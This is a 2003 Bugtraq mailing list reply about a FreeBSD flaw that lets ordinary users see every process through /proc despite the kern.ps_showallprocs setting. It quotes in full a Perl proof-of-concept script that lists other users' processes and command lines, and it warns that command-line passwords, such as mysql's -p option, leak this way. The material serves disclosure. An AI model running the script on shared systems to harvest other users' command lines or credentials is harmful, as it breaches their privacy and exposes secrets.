[28497] in bugtraq
Re: ps information leak in FreeBSD
daemon@ATHENA.MIT.EDU (Jez Hancock)
Mon Jan 20 23:38:48 2003
Date: Tue, 7 Jan 2003 09:18:00 +0000
From: Jez Hancock <jez.hancock@munk.nu>
To: bugtraq@securityfocus.com
Message-ID: <20030107091800.GC56102@users.munk.nu>
Mail-Followup-To: bugtraq@securityfocus.com,
Cache <cache@sowatech.com.pl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030105204650.M16523@sowatech.com.pl>
On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;
This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc. The following script was also
posted by someone to demonstrate this:
#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill. its basically an output format]
#
# Tested on FreeBSD 4.5-RC.
print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
if(${proc}=~/[0-9]/o){
unshift(@pids, ${proc});
}
}
foreach $pid (@pids){
open(FD, "ls -al /proc/$pid/file|");
while(<FD>){
chomp;
${l}=$_;
${l}=~s/\s{1,}/ /g;
if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
&ppid(${1},${2},${pid},${3});
}
}
close(FD);
}
exit(0);
sub ppid(){
(${a},${b},${c},${d})=@_;
undef(${str});
undef(${line});
if(-e "/proc/$c/cmdline"){
open(heh,"cat /proc/$c/cmdline|");
@hah=<heh>;
@chars=split(//,@hah[0]);
foreach ${chr} (@chars){
if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
${str}.=" ";
}else{
${str}.=${chr};
}
}
${line}.=${a};
while(length(${line})<11){${line}.=" ";} #alignment...
${line}.=" ".${b};
while(length(${line})<23){${line}.=" ";}
${line}.=" ".${c};
while(length(${line})<31){${line}.=" ";}
chop(${str});
if(${d}eq"unknown"){
${str}=~s/\s{1,}//g;
${line}.=" ("."${str}".")";
}else{
${line}.=" "."${str}";
}
@line=split(//,${line});
if(length(${line})>80){
${cntr}=0;
foreach ${char} (@line){
if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
print "\n"." "x32; #^Anything >, deal with the rollover.
}
print "${char}";
${cntr}++;
}
print "\n";
}
else{
print "${line}\n";
}
return(0);
}
}
I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.
It's annoying in that I see a lot of users running mysql with the -u and -p options:
mysql -u user -p mypassword
on the commandline, thinking that this info will not show up in ps listings when ps
is run by other users. Ho hum...
Regards,
Jez Hancock
